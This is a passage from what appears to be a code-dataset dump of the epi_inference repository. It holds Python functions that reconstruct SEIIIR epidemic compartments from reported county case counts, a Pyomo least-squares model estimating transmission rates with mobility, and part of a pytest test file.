reporting_delay_mean=8, reporting_delay_dev=1.35,\n reporting_multiplier=10,\n fixed_incubation=5.2,\n infectious_lower=2.6, infectious_upper=6, seed=0):\n \"\"\"\n This function computes a reconstruction of the SEIIIR compartments based on the reported cases.\n 1. for each day, the actual number of cases is sampled from an inverse binomial using the reported\n cases and the reporting_multiplier\n 2. for each case, we sample the reporting_delay using a log-normal with the reporting_delay_mean and\n reporting_delay_dev - this produces the vector of transmissions in time\n 3. The transmissions in time cause movement from S->E, and then a discrete-time SEIIIR model is used\n to populate the compartments.\n\n Parameters\n ----------\n dates : list\n list of datetime objects corresponding to the dates of the reported_cases_per_day\n reported_cases_per_day : list\n list of the reported cases per day\n population : float\n population of this node (county)\n n_steps_per_day : int\n the number of timesteps to take in one day (e.g., value of 4 means the delta_t = 0.25 days)\n reporting_delay_mean : float\n reporting delay is drawn from a log normal\n d=np.random.lognormal(np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev))\n Note: If reporting_delay_dev is set to None, then the reporting delay is fixed to the value of\n reporting_delay_mean and not sampled.\n reporting_delay_dev : float\n reporting delay is drawn from a log normal\n d=np.random.lognormal(np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev))\n Note: If this is set to None, then the reporting delay is fixed to the value of reporting_delay_mean\n and not sampled.\n reporting_multiplier : int\n the number of actual cases per reported case (i.e., reporting fraction is 1/reporting_multiplier)\n fixed_incubation : float\n the incubation period in days\n infectious_lower : float\n the infectious period is drawn from a uniform distribution between infectious_lower and infectious_upper\n infectious_upper : float\n the infectious period is drawn from a uniform distribution between infectious_lower and infectious_upper\n seed: int\n the seed for the random number generator\n\n Returns\n -------\n dict : a dict of the dates and the compartments\n \"\"\"\n if seed:\n np.random.seed(seed)\n\n n_r_days = len(dates)\n\n # create a vector of the infections in time (when the infection occurred - S->E)\n # this is called T (transmissions) in the code -> see tdates, tcases\n # 
this needs to be padded at the front with days prior to the reporting dates\n # and converted to timesteps that includes \"steps per day\"\n assert type(n_steps_per_day) is int\n assert n_steps_per_day >= 1\n padding_days = 50 # days - maybe this should be passed in?\n padding_timesteps = padding_days*n_steps_per_day\n tcases_timestep = [0]*(n_r_days+padding_days)*n_steps_per_day\n\n # probability of confirmation of case - reporting fraction\n # this should be drawn from a distribution as well if good data exists\n p = 1 / reporting_multiplier\n\n # loop through each day and draw the total number of cases that day\n # from the reported cases and the reporting fraction\n # These are the total number of cases that could be reportable\n for r_day in range(len(dates)):\n r_timestep = r_day*n_steps_per_day\n if reported_cases_per_day[r_day] > 0:\n # draw the total number of reportable cases\n reportable_cases_day = int(reported_cases_per_day[r_day] + np.random.negative_binomial(reported_cases_per_day[r_day],p))\n\n if reportable_cases_day > 0:\n # now draw the delays from infection to confirmation (log normal)\n # one delay is drawn for each reportable case and is in units of days\n if reporting_delay_dev is None:\n # used for testing against simulated data\n delays_days = [reporting_delay_mean]*reportable_cases_day\n delays_days = [d*n_steps_per_day for d in delays_days]\n else:\n delays_days = np.random.lognormal(mean=np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev), size=reportable_cases_day)\n # convert this to timesteps\n assert type(delays_days) is np.ndarray\n delays_days = delays_days*n_steps_per_day\n delays_timesteps = np.round(delays_days).astype(int)\n # add one transmission (infection) based on each reportable case and its delay\n for delay_timestep in delays_timesteps:\n if r_timestep - delay_timestep + padding_timesteps >= 0:\n tcases_timestep[r_timestep - delay_timestep + padding_timesteps] += 1\n\n # truncate some days off of the transmissions\n # since we don't yet have the reported cases to estimate this appropriately\n int_delay = int(np.round(1.64*reporting_delay_mean))\n t_daily_dates = [dates[0] + timedelta(days=i) for i in range(-padding_days, n_r_days - int_delay)]\n tcases_timestep = tcases_timestep[: -int_delay * n_steps_per_day]\n\n # capture the reported cases per day - add the padding and truncate the end\n output_reported_cases = [0]*padding_days\n output_reported_cases.extend(reported_cases_per_day[: -int_delay])\n\n # use these transmissions to generate a single stochastic reconstruction\n # of each of the compartments (SEIIIR)\n S = np.zeros(len(tcases_timestep))\n S[0] = population\n E = np.zeros(len(tcases_timestep))\n I1 = np.zeros(len(tcases_timestep))\n I2 = np.zeros(len(tcases_timestep))\n I3 = np.zeros(len(tcases_timestep))\n R = np.zeros(len(tcases_timestep))\n\n # Approach 1:\n # - sigma is fixed at 1/5.2 days\n # - serial interval is drawn from uniform 6.5-8.2, and used\n # to compute gamma\n # It might be better to just draw sigma and gamma from separate\n # distributions here.\n # Here, the serial interval is drawn once and that value is used\n # for the entire simulation, however, it could be drawn for each day\n # as well.\n # Note: These are drawn for every day, but they are the same for each day\n # - this is done so the code is ready for different values on each day if\n # we decide to do that.\n sigma = 1.0/fixed_incubation*np.ones(len(tcases_timestep)) # days\n infectious_period = np.random.uniform(infectious_lower, 
infectious_upper)*np.ones(len(tcases_timestep)) # CDL , size=len(tcases_timestep))\n gamma = np.reciprocal(infectious_period)\n #incubation = np.random.exponential(scale=mean_incubation, size=len(tcases))\n # CDL serial_interval = np.random.uniform(6.35, 8.05)*np.ones(len(tcases_timestep))\n #serial_interval = np.random.uniform(6.5, 8.2)*np.ones(len(tcases_timestep))\n # compute gamma = 1/ ( 2*(SI-1/sigma) )\n #temp = np.copy(sigma)\n #np.reciprocal(temp, out=temp)\n #temp = 2*(serial_interval-temp)\n #gamma = np.reciprocal(temp)\n \n prob_E = 1-np.exp(-1.0/n_steps_per_day*sigma)\n prob_III = 1-np.exp(-1.0/n_steps_per_day*3*gamma)\n\n # loop through all of the days and compute the compartments\n # with the stochastic simulations\n for t in range(len(tcases_timestep)-1):\n Stout = tcases_timestep[t]\n if Stout >= S[t]:\n # reconstruction indicates the number of infections\n # exceed the population - flag this for error reporting\n # means the reported cases or reporting factor are too large\n # for the population value specified\n # Todo: flag a warning\n Stout = S[t]\n \n S[t+1] = S[t] - Stout\n Etout = np.random.binomial(E[t], prob_E[t])\n E[t+1] = E[t] + Stout - Etout\n I1tout = np.random.binomial(I1[t], prob_III[t])\n I1[t+1] = I1[t] + Etout - I1tout\n I2tout = np.random.binomial(I2[t], prob_III[t])\n I2[t+1] = I2[t] + I1tout - I2tout\n I3tout = np.random.binomial(I3[t], prob_III[t])\n I3[t+1] = I3[t] + I2tout - I3tout\n R[t+1] = R[t] + I3tout\n\n # now bring these vectors back to days\n S = [S[t] for t in range(len(S)) if t % n_steps_per_day == 0]\n E = [E[t] for t in range(len(E)) if t % n_steps_per_day == 0]\n I1 = [I1[t] for t in range(len(I1)) if t % n_steps_per_day == 0]\n I2 = [I2[t] for t in range(len(I2)) if t % n_steps_per_day == 0]\n I3 = [I3[t] for t in range(len(I3)) if t % n_steps_per_day == 0]\n R = [R[t] for t in range(len(R)) if t % n_steps_per_day == 0]\n T = [None]*len(S)\n for day_idx in range(len(T)):\n T[day_idx] = 0\n for t in range(n_steps_per_day):\n T[day_idx] += tcases_timestep[t+day_idx*n_steps_per_day]\n assert len(t_daily_dates) == len(T)\n assert len(t_daily_dates) == len(S)\n # return the output\n # - rdates, rcases: reported cases and their dates\n # (new reported cases each day - not cumulative)\n # - tdates: dates for all the other compartments\n # - tcases: transmissions (reportable cases at the time\n # of the initial transmission\n # - S,E,I1,I2,I3,R: numbers of individuals in each of the\n # compartments on the dates in tdates\n return Bunch(dates=t_daily_dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T, orig_rep_cases=output_reported_cases)\n\ndef np_stochastic_reconstruction(*, dates,\n reported_cases_per_day,\n counties,\n populations,\n n_steps_per_day,\n reporting_delay_mean=8, reporting_delay_dev=1.35,\n reporting_multiplier=10,\n fixed_incubation=5.2,\n infectious_lower=2.6, infectious_upper=6):\n \"\"\"\n This function computes a reconstruction of the SEIIIR compartments based on the reported cases.\n 1. for each day, the actual number of cases is sampled from an inverse binomial using the reported\n cases and the reporting_multiplier\n 2. for each case, we sample the reporting_delay using a log-normal with the reporting_delay_mean and\n reporting_delay_dev - this produces the vector of transmissions in time\n 3. 
The transmissions in time cause movement from S->E, and then a discrete-time SEIIIR model is used\n to populate the compartments.\n\n Parameters\n ----------\n dates : numpy array of datetime objects\n The dates corresponding to the rows in the cumulative reported cases\n counties : numpy array of object (strings)\n The names of the counties (or nodes) corresponding to the columns in the\n cumulative reported cases\n reported_cases_per_day : Numpy two-dimensional array\n This is a numpy array that contains the reported cases per day. Each row\n corresponds to a different day, and each column is a different county (node).\n populations : numpy array of populations\n This is an array of populations. Each entry corresponds to one of the counties\n n_steps_per_day : int\n the number of timesteps to take in one day (e.g., value of 4 means the delta_t = 0.25 days)\n reporting_delay_mean : float\n reporting delay is drawn from a log normal\n d=np.random.lognormal(np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev))\n Note: If reporting_delay_dev is set to None, then the reporting delay is fixed to the value of\n reporting_delay_mean and not sampled.\n reporting_delay_dev : float\n reporting delay is drawn from a log normal\n d=np.random.lognormal(np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev))\n Note: If this is set to None, then the reporting delay is fixed to the value of reporting_delay_mean\n and not sampled.\n reporting_multiplier : int\n the number of actual cases per reported case (i.e., reporting fraction is 1/reporting_multiplier)\n fixed_incubation : float\n the incubation period in days\n infectious_lower : float\n the infectious period is drawn from a uniform distribution between infectious_lower and infectious_upper\n infectious_upper : float\n the infectious period is drawn from a uniform distribution between infectious_lower and infectious_upper\n\n Returns\n -------\n Bunch : (like a dict with keys: dates, S, E, I1, I2, I3, R, transmissions)\n dates: dates corresponding to the states in the model\n S: numpy array of susceptible population values\n E: numpy array of exposed population values\n I1, I2, I3: numpy arrays of infective counts in I1, I2, and I3 compartments respectively\n R: numpy array of recovered population values\n transmissions: numpy array of transmissions (from S->E) \n \"\"\"\n # check the types\n assert isinstance(dates, np.ndarray) and dates.dtype == np.object\n assert isinstance(counties, np.ndarray) and counties.dtype == np.object\n assert isinstance(reported_cases_per_day, np.ndarray) and reported_cases_per_day.dtype == np.float\n \n n_r_days = len(dates)\n n_counties = len(counties)\n assert reported_cases_per_day.shape[0] == n_r_days\n assert reported_cases_per_day.shape[1] == n_counties\n assert np.all(populations > 0)\n\n # create an array of the infections in time (when the infection occurred - S->E)\n # this is called tcases (transmissions) in the code\n # the tcases array needs to be padded at the front with days prior to the reporting dates\n # and converted to timesteps that includes \"steps per day\"\n assert type(n_steps_per_day) is int\n assert n_steps_per_day >= 1\n padding_days = 30 # days - maybe this should be passed in?\n padding_timesteps = padding_days*n_steps_per_day\n n_r_daily_dates = len(dates) # number of days of reported cases\n n_timesteps = (n_r_days+padding_days)*n_steps_per_day\n tcases_timestep = np.zeros((n_timesteps,n_counties))\n\n # probability of confirmation of case - reporting fraction\n # 
this should be drawn from a distribution as well if good data exists\n p = 1 / reporting_multiplier\n\n # loop through each day and draw the total number of cases that day\n # from the reported cases and the reporting fraction\n # These are the total number of cases that could be reportable\n for r_day in range(len(dates)):\n r_timestep = r_day*n_steps_per_day\n reported_cases = reported_cases_per_day[r_day,:]\n #foo = np.random.negative_binomial([100,10000], p=0.1, size=(1000,2))\n # loop over each of the counties\n for c, cname in enumerate(counties):\n if reported_cases[c] > 0:\n # draw the total number of reportable cases\n reportable_cases_day = int(reported_cases[c] + np.random.negative_binomial(reported_cases[c],p))\n if reportable_cases_day > 0:\n # now draw the delays from infection to confirmation (log normal)\n # one delay is drawn for each reportable case and is in units of days\n if reporting_delay_dev is None:\n # used for testing against simulated data\n delays_days = reporting_delay_mean*np.ones(reportable_cases_day)\n # convert to timesteps instead of days\n delays_days = n_steps_per_day*delays_days\n else:\n delays_days = np.random.lognormal(mean=np.log(reporting_delay_mean), sigma=np.log(reporting_delay_dev), size=reportable_cases_day)\n # convert this to timesteps instead of days\n assert type(delays_days) is np.ndarray\n delays_timesteps = delays_days*n_steps_per_day\n # round to integer timestep\n delays_timesteps = np.round(delays_timesteps).astype(int)\n # add one transmission (infection) based on each reportable case and its delay\n for delay_timestep in delays_timesteps:\n tcases_timestep[r_timestep - delay_timestep + padding_timesteps,c] += 1\n\n # truncate days off of the transmissions\n # since we don't yet have the reported cases to estimate this appropriately\n # (round the truncation to a whole number of days so it can be used as an index)\n t_daily_dates = np.asarray([dates[0] + timedelta(days=i) for i in range(-padding_days, n_r_days - int(np.round(1.64*reporting_delay_mean)))],dtype=object)\n tcases_timestep = tcases_timestep[:-int(np.round(1.64*reporting_delay_mean))*n_steps_per_day,:]\n n_timesteps = len(tcases_timestep)\n \n # create arrays to store compartment numbers\n S = np.zeros((n_timesteps,len(counties)), dtype=int)\n E = np.zeros((n_timesteps,len(counties)), dtype=int)\n I1 = np.zeros((n_timesteps,len(counties)), dtype=int)\n I2 = np.zeros((n_timesteps,len(counties)), dtype=int)\n I3 = np.zeros((n_timesteps,len(counties)), dtype=int)\n R = np.zeros((n_timesteps,len(counties)), dtype=int)\n\n # assume fully susceptible population to start\n S[0,:] = populations\n E[0,:] = 0\n I1[0,:] = 0\n I2[0,:] = 0\n I3[0,:] = 0\n R[0,:] = 0\n\n # Approach 1:\n # - sigma is fixed at 1/5.2 days\n # - serial interval is drawn from uniform 6.5-8.2, and used\n # to compute gamma\n # It might be better to just draw sigma and gamma from separate\n # distributions here.\n # Here, the serial interval is drawn once and that value is used\n # for the entire simulation, however, it could be drawn for each day\n # as well.\n # Note: These are drawn for every day, but they are the same for each day\n # - this is done so the code is ready for different values on each day if\n # we decide to do that.\n sigma = 1.0/fixed_incubation # units of days\n infectious_period = np.random.uniform(infectious_lower, infectious_upper)*np.ones(len(tcases_timestep)) # CDL, size=len(tcases_timestep))\n gamma = np.reciprocal(infectious_period)\n #incubation = np.random.exponential(scale=mean_incubation, size=len(tcases))\n # CDL serial_interval = np.random.uniform(6.35, 
8.05)*np.ones(len(tcases_timestep))\n #serial_interval = np.random.uniform(6.5, 8.2)*np.ones(len(tcases_timestep))\n # compute gamma = 1/ ( 2*(SI-1/sigma) )\n #temp = np.copy(sigma)\n #np.reciprocal(temp, out=temp)\n #temp = 2*(serial_interval-temp)\n #gamma = np.reciprocal(temp)\n \n prob_E = 1-np.exp(-1.0/n_steps_per_day*sigma)\n prob_III = 1-np.exp(-1.0/n_steps_per_day*3*gamma)\n\n # loop through all of the days and compute the compartments\n # with the stochastic simulations\n for t in range(len(tcases_timestep)-1):\n Stout = tcases_timestep[t,:]\n if np.any(Stout >= S[t,:]):\n # reconstruction indicates the number of infections\n # exceed the population - flag this for error reporting\n # means the reported cases or reporting factor are too large\n # for the population value specified\n # Todo: flag a warning\n print(\"WARNING: cases exceeded population size. Ignoring cases that exceed population size.\")\n Stout = np.minimum(Stout, S[t,:])\n \n S[t+1,:] = S[t,:] - Stout\n Etout = np.random.binomial(E[t,:], prob_E, size=n_counties)\n E[t+1,:] = E[t,:] + Stout - Etout\n I1tout = np.random.binomial(I1[t,:], prob_III[t], size=n_counties)\n I1[t+1,:] = I1[t,:] + Etout - I1tout\n I2tout = np.random.binomial(I2[t,:], prob_III[t], size=n_counties)\n I2[t+1,:] = I2[t,:] + I1tout - I2tout\n I3tout = np.random.binomial(I3[t,:], prob_III[t], size=n_counties)\n I3[t+1,:] = I3[t,:] + I2tout - I3tout\n R[t+1,:] = R[t,:] + I3tout\n\n # now bring these vectors back to days\n timesteps_days = [t for t in range(len(S)) if t % n_steps_per_day == 0] \n S = S[timesteps_days]\n E = E[timesteps_days]\n I1 = I1[timesteps_days]\n I2 = I2[timesteps_days]\n I3 = I3[timesteps_days]\n R = R[timesteps_days]\n T = np.zeros((len(t_daily_dates)+1, n_counties))\n T[1:] = np.cumsum(tcases_timestep, axis=0)[timesteps_days]\n T = np.diff(T, axis=0)\n assert len(t_daily_dates) == T.shape[0]\n assert n_counties == T.shape[1]\n assert len(t_daily_dates) == S.shape[0]\n assert n_counties == S.shape[1]\n\n assert np.any(np.isfinite(S))\n assert np.any(np.isfinite(E))\n assert np.any(np.isfinite(I1))\n assert np.any(np.isfinite(I2))\n assert np.any(np.isfinite(I3))\n assert np.any(np.isfinite(R))\n assert np.any(np.isfinite(T))\n \n return Bunch(dates=t_daily_dates, counties=counties, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T)\n" }, { "alpha_fraction": 0.6180124282836914, "alphanum_fraction": 0.6195651888847351, "avg_line_length": 32.30172348022461, "blob_id": "5d61f8f57c0e14f130122e0049718b10dbb259a5", "content_id": "9e8ca25cc0d647840a2889545c9f45f179e0c471", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3864, "license_type": "no_license", "max_line_length": 184, "num_lines": 116, "path": "/epi_inference/reconstruction/recon_deterministic_delay_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\nimport datetime\nimport pandas as pd\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..util import load_population, save_results\nfrom ..collect.misc import load_collect\nfrom ..reconstruction.deterministic import reconstruct_states_deterministic_decay\nfrom ..reconstruction.common import reported_cases_from_cumulative\n\n\ndef run_county(county, df, population, CONFIG, warnings):\n #\n # Initialize results dictionary\n #\n results = {'FIPS':county}\n for key, value in 
CONFIG.get('factor_levels',{}).items():\n if not key in results:\n results[key] = value\n #\n # Get the cumulative cases\n #\n cumulative_reported_cases = df[county].to_list()\n\n # reconstruct the states\n Cdates = [datetime.date.fromisoformat(day) for day in df.index.to_list()]\n reported_cases_per_day = \\\n reported_cases_from_cumulative(dates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases)\n\n res = reconstruct_states_deterministic_decay(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values,\n population=population,\n sigma=CONFIG['sigma'],\n gamma=CONFIG['gamma'],\n reporting_factor=CONFIG['reporting_factor'],\n report_delay=CONFIG['deltaP'],\n county=county,\n warnings=warnings)\n\n # TODO - keep rdates and rcases?\n #results['rdates'] = reported_cases_per_day.dates\n #results['rcases'] = reported_cases_per_day.values\n results['dates'] = res.dates\n results['transmissions'] = res.transmissions\n results['S'] = res.S\n results['E'] = res.E\n results['I1'] = res.I1\n results['I2'] = res.I2\n results['I3'] = res.I3\n results['R'] = res.R\n results['population'] = population\n results['orig_rep_cases'] = res.orig_rep_cases\n\n return results\n\n\ndef run(CONFIG, warnings):\n #\n # Load the population data\n #\n population_df = load_population(CONFIG['population_csv']['file'], CONFIG['population_csv']['index'])\n #\n # Load the case data \n #\n df = load_collect(CONFIG['input_csv'])\n #\n # Perform construction\n #\n results = {}\n if 'county' in CONFIG:\n counties = [CONFIG['county']]\n else:\n counties = df.keys()\n\n if CONFIG['verbose']:\n timing.tic()\n for t in counties:\n if t not in population_df[CONFIG['population_csv']['population']]:\n warnings.append(\"WARNING: county %s does not have population data available\" % str(t))\n continue\n results[t] = run_county(t, df, population_df[CONFIG['population_csv']['population']][t], CONFIG, warnings)\n if CONFIG['verbose']:\n timing.toc(\"Serial Execution\")\n #\n # Save results\n #\n save_results(results, CONFIG['output_json'])\n save_metadata(CONFIG, warnings)\n\n\nclass ReconstructionDeterministicDelay(Task):\n\n def __init__(self):\n Task.__init__(self, \"reconstruction_deterministic_delay\",\n \"Perform compartment reconstruction using a deterministic delay.\")\n\n def validate(self, CONFIG):\n valid_options = set(['sigma', 'gamma', 'reporting_factor', 'deltaP', 'population_csv', 'input_csv', 'county', 'output_json', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run(CONFIG, self._warnings)\n\n\nregister_task(ReconstructionDeterministicDelay())\n\n" }, { "alpha_fraction": 0.6059779524803162, "alphanum_fraction": 0.6121791005134583, "avg_line_length": 38.71428680419922, "blob_id": "906e6640403adeb549c091db4f63d41c773e35a1", "content_id": "199d3c441458c893cb70ef3197b55a670634c987", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8063, "license_type": "no_license", "max_line_length": 220, "num_lines": 203, "path": "/epi_inference/formulations/multinode_mobility_window_decay_lsq_old.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_multinode_mobility_window_decay_lsq_old']\n\nimport pyutilib.misc.timing as timing\nimport pyomo.environ as pe\nfrom pyomo.environ import 
SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\n\n\ndef run_multinode_mobility_window_decay_lsq_old(*, recon, mobility, analysis_window, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n recon : dict()\n A dictionary with reconstruction data, indexed by FIPS codes for US counties.\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # create the Pyomo optimization formulation\n m = create_inference_window_formulation(\n recon=recon,\n mobility=mobility,\n analysis_window=analysis_window,\n verbose=verbose\n )\n\n # call the solver\n timing.tic('Starting timer for solver')\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m)\n timing.toc('Finished solver')\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = list()\n for i in m.NODES:\n for w in m.WINDOWS:\n d = dict()\n d['date'] = m.DATES[w]\n d['window_days'] = m.window_days\n if m.beta[i,w].stale == True:\n d['est_beta'] = None\n d['status'] = 'stale'\n else:\n d['est_beta'] = value(m.beta[i,w])\n d['status'] = 'ok'\n d['population'] = recon[i]['population']\n d['infections_in_window'] = m.window_transmissions[i][w]\n d['FIPS'] = i\n results.append(d)\n\n return {'results': results}\n\n\ndef create_inference_window_formulation(*, recon, mobility, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. 
If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n\n \"\"\"\n window = int(analysis_window.get('days',14))\n assert(window >= 1)\n\n timing.tic('Starting timer for model construction')\n model = pe.ConcreteModel()\n\n # Cached data\n #model.sigma = sigma\n #model.gamma_1 = gamma_1\n #model.gamma_2 = gamma_2\n #model.gamma_3 = gamma_3\n model.eta = 0.5 # fraction of the day spent \"away\"\n #model.report_delay = report_delay\n #model.reporting_factor = reporting_factor\n #model.delta_beta_regu = 1e-4\n\n model.NODES = pe.Set(initialize=list(k for k in recon.keys()))\n\n model.mobility = dict(mobility)\n model.MOBILITY_TUPLES = list()\n for i in model.NODES:\n if i not in model.mobility:\n model.mobility[i] = {}\n for j in model.mobility[i]:\n if i in model.NODES and j in model.NODES:\n model.MOBILITY_TUPLES.append((i,j))\n \n model.T_data = dict()\n model.I_data = dict()\n model.S_data = dict()\n model.populations = dict()\n for nodeid in model.NODES:\n #model.populations[nodeid] = float(populations[nodeid]) # overall population\n #cm_rep_cases_node = [v for v in cumulative_reported_cases[nodeid].values]\n #\n #rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n # recon.reconstruct_states_deterministic_decay(\n # Cdates=Cdates,\n # cumulative_reported_cases=cm_rep_cases_node,\n # population=model.populations[nodeid],\n # sigma=sigma,\n # gamma=gamma_1/3,\n # reporting_factor=reporting_factor,\n # report_delay=report_delay\n # )\n model.T_data[nodeid] = recon[nodeid]['transmissions']\n model.I_data[nodeid] = dict()\n model.I_data[nodeid]['I1'] = recon[nodeid]['I1']\n model.I_data[nodeid]['I2'] = recon[nodeid]['I2']\n model.I_data[nodeid]['I3'] = recon[nodeid]['I3']\n model.S_data[nodeid] = recon[nodeid]['S']\n \n model.populations[nodeid] = recon[nodeid]['population']\n\n if not hasattr(model, 'TIMES'):\n model.TIMES = pe.Set(initialize=[i for i in range(len(recon[nodeid]['transmissions']))], ordered=True)\n if not hasattr(model, 'DATES'):\n model.DATES = recon[nodeid][\"dates\"]\n timing.toc('setup population and mobility information')\n\n # define the tuples for the windows\n model.WINDOWS = list()\n model.WINDOW_TIMES = list()\n model.window_days = window\n for i in range(len(model.TIMES)):\n if i % 7 != 0:\n continue\n if i < model.window_days:\n continue\n for j in range(i+1-model.window_days, i+1):\n model.WINDOW_TIMES.append((i,j)) \n model.WINDOWS.append(i)\n timing.toc('built windows')\n\n # get the approximate transmissions over the window period\n model.window_transmissions = dict()\n for i in model.NODES:\n d = dict()\n for w in model.WINDOWS:\n d[w] = sum(model.T_data[i][t] for ww,t in model.WINDOW_TIMES if ww == w)\n model.window_transmissions[i] = d\n #print(WINDOWS)\n #for t in WINDOW_TIMES:\n # print(t)\n #quit()\n \n model.beta = pe.Var(model.NODES, model.WINDOWS, initialize=1.0, bounds=(0,None)) # transmission parameter\n # for now, alpha is not used\n # model.alpha = pe.Var(initialize=1.0)\n # model.alpha.fix(1.0)\n\n # define the variable for estimated transmissions\n model.T_hat = pe.Var(model.NODES, model.WINDOW_TIMES, initialize=1.0)\n timing.toc('built variables')\n # infection process\n def _infection_process(m, i, w, t):\n percent_mobile = 0\n if i in m.mobility:\n percent_mobile = sum(m.mobility[i][j]/m.populations[i] for j in m.mobility[i] if j in m.NODES)\n\n return m.T_hat[i,w,t] == m.beta[i,w] * (m.I_data[i]['I1'][t] + 
m.I_data[i]['I2'][t] + m.I_data[i]['I3'][t]) / m.populations[i] * m.S_data[i][t] * (1-m.eta*percent_mobile) \\\n + sum(m.beta[j,w] * (m.I_data[j]['I1'][t] + m.I_data[j]['I2'][t] + m.I_data[j]['I3'][t]) / m.populations[j] * m.S_data[i][t] * (m.eta*m.mobility[i][j]/m.populations[i]) for j in m.mobility[i] if j in m.NODES)\n\n model.infection_process = pe.Constraint(model.NODES, model.WINDOW_TIMES, rule=_infection_process)\n timing.toc('built infection process')\n \"\"\"\n model.delta_beta = pe.Var(model.MOBILITY_TUPLES, model.WINDOWS)\n def _delta_beta_con(m, i, j, w):\n return m.delta_beta[i,j,w] == m.beta[i,w] - m.beta[j,w]\n model.delta_beta_con = pe.Constraint(model.MOBILITY_TUPLES, model.WINDOWS, rule=_delta_beta_con)\n \"\"\"\n # least squares objective function\n def _lse(m, i):\n return sum( (m.T_hat[i,w,t] - m.T_data[i][t])**2 for w,t in m.WINDOW_TIMES) #\\\n #+ m.delta_beta_regu*sum( m.mobility[i][j]*m.delta_beta[i,j,w]**2 for j in m.mobility[i] for w in m.WINDOWS if i in m.NODES and j in m.NODES)\n model.lse = pe.Expression(model.NODES, rule=_lse)\n\n def _total_lse(m):\n return sum( m.lse[i] for i in m.NODES )\n model.total_lse = pe.Objective(rule=_total_lse)\n timing.toc('built objective')\n\n return model\n\n" }, { "alpha_fraction": 0.5772432684898376, "alphanum_fraction": 0.6061517000198364, "avg_line_length": 27.4407901763916, "blob_id": "7770a9fb67d7aec92ee932a730c7be58519cf8ea", "content_id": "bb4ad6147267801555f71160856b9ebb0102f61d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4324, "license_type": "no_license", "max_line_length": 80, "num_lines": 152, "path": "/epi_inference/engine/tests/test_engine.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport json\n\nfrom jsondiff import diff\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\nfrom epi_inference.engine import driver\nfrom epi_inference.engine.task import Task\nfrom epi_inference.engine.task_registry import register_task\n\n\ndef compare_json(output, gold, check_exact=False): # pragma: no cover\n with open(output,'r') as INPUT:\n outputdf = json.load(INPUT)\n with open(gold,'r') as INPUT:\n golddf = json.load(INPUT)\n d = diff(outputdf, golddf)\n if len(d) != 0:\n print('DIFFERENCES IN JSON')\n print(d)\n assert(len(d) == 0)\n return outputdf, golddf\n\n\nclass Task1(Task):\n\n def __init__(self):\n Task.__init__(self, 'task1', \"A task used for testing\")\n\n def run(self, data, args):\n with open(args['output'], \"w\") as OUTPUT:\n json.dump(args, OUTPUT)\n\nregister_task(Task1())\n\n\nclass TestEngine():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_test1(self):\n args = Options()\n args.block = 'test1'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test1_output1.json', 'test1_baseline1.json')\n os.remove('test1_output1.json')\n\n compare_json('test1_output2.json', 'test1_baseline2.json')\n os.remove('test1_output2.json')\n\n def test_test2(self):\n args = Options()\n args.block = 'test2'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test2_output1.json', 'test2_baseline1.json')\n os.remove('test2_output1.json')\n\n def test_test3(self):\n args = Options()\n args.block = 
